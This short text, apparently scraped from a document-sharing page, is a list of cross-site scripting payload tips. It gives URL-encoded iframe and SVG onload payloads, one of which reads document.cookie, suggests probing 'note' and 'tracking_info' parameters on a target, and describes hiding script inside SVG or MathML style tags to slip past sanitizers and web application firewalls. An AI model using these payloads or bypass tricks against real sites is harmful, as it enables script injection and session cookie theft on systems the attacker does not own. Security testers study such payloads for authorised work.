Professional Documents
Culture Documents
%22%26%23x27%3B%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aprompt.valueOf%28%29%281%29%3E%3C
%2FiFramE%3E
%3CsVg%2Fonload%3Dprompt%28document.cookie%29%3E
Don't forget check note and tracking_info parameter if you see it in your target:)
start_sequence = "<script>\nonload=alert(\"xss\");</script>"
Try to hide your XSS payload inside the style tag of the SVG or Math element to
bypass the XSS Sanitizer or WAF filter. <svg><style> <script>alert(1)</script>
</style></svg> <math><style> <img src onerror=alert(2)> </style></math>